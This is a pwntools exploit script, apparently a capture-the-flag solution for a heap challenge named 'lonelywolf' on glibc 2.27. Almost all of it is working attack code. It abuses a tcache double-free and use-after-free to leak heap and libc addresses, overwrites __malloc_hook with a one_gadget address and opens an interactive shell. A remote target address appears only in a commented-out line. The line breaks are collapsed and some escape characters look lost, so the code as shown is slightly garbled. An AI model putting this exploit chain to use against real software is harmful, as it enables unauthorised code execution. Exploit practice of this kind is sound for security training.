lonelywolf
from pwn import * context.arch = 'amd64' context.log_level='debug' p=process('./pwn') libc=ELF('./libc-2.27.so') #p=remote('124.71.235.219',25196) def add(idx,size): p.recvuntil('Your choice: ') p.sendline('1') p.recvuntil('Index: ') p.sendline(str(idx)) p.recvuntil('Size: ') p.sendline(str(size)) def edit(idx,content): p.recvuntil('Your choice: ') p.sendline('2') p.recvuntil('Index: ') p.sendline(str(idx)) p.recvuntil('Content: ') p.sendline(content) def show(idx): p.recvuntil('Your choice: ') p.sendline('3') p.recvuntil('Index: ') p.sendline(str(idx)) def free(idx): p.recvuntil('Your choice: ') p.sendline('4') p.recvuntil('Index: ') p.sendline(str(idx)) add(0,0x78) for i in range(2): edit(0,'aaaaaaaa') free(0) show(0) p.recvuntil('Content: ') heap_base=u64(p.recv(6).ljust(8,b'x00'))-0x260 log.success('heap_base :'+hex(heap_base)) payload=p64(0)*3+p64(0x451) add(0,0x78) edit(0,payload) for i in range(10): add(0,0x68) free(0) edit(0,b'p'*8) free(0) edit(0,p64(heap_base+0x280)+p64(0)) add(0,0x68) add(0,0x68) free(0) show(0) p.recvuntil('Content: ') libc_base=u64(p.recvuntil('x7f').ljust(8,b'x00'))-96-0x10-libc.symbols['__malloc_hook']#0x3ebca0 log.success('libc_base:'+hex(libc_base)) malloc_hook=libc_base+libc.symbols['__malloc_hook'] add(0,0x70) free(0) edit(0,'p'*8) free(0) edit(0,p64(malloc_hook)) add(0,0x70) add(0,0x70) edit(0,p64(0x10a41c+libc_base)) #gdb.attach(p) add(0,0x10) p.interactive()